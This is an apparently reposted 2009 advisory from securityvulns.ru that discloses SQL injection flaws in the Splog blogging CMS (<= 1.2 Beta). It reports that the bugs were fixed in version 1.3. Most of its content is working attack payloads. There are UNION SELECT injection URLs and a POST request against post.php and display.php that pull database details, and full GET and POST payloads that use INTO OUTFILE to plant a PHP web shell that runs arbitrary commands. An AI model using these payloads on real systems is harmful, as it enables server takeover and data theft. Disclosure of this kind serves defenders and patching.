Computer Security

Security Advisory: MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [DSF-02-2009] - Zoki Catalog SQL Injection

  Cross-Site Scripting vulnerability in XAMPP

  MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->

  MULTIPLE SQL INJECTION VULNERABILITIES --S-CMS <= v-2.0 Beta3-->

From:y3nh4ck3r_(at)_gmail.com <y3nh4ck3r_(at)_gmail.com>
Date:14.06.2009
Subject:MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->

-----------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
-----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/splog/
-->DOWNLOAD: http://sourceforge.net/projects/splog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing
               full integration into a website by being designed for use...
-->RELEASED: 2009-06-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)
-->Discovered Bug date: 2009-06-08
-->Reported Bug date: 2009-06-09
-->Fixed bug date: 2009-06-10
-->Info patch (1.3): http://sourceforge.net/projects/splog/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


-------------------
PROOF OF CONCEPT:
-------------------


<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>



[++] GET var --> 'id'

[++] File vuln --> 'post.php'


~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),
database(),version(),user(),database()%23



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>


[++] POST var --> 'pCategory'

[++] File vuln --> 'display.php'


POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION


[++[Return]++] ~~~~~> user, version or database.


----------
EXPLOIT:
----------


<<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>>


[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-
1+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY
--Y3NH4CK3R--></title>','<body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font
color=ff0000><h2>Get var (cmd) to execute comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php
system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By y3nh4ck3r. Contact:
y3nh4ck3r@gmail.
com</h3></font></body></HTML>'+INTO+OUTFILE+'[COM
PLETE-PATH]/shell.php'%23

[POST]~~~~~>

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R--></title>','<body text=ffffff
bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) to execute
comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font
color=ff0000>','<h3>By y3nh4ck3r. Contact:
y3nh4ck3r@gmail.
com</h3></font></body></HTML>'+INTO+OUTFILE+'[COM
PLETE-PATH]/shell.php'# <--- INJECTION


[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php




#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru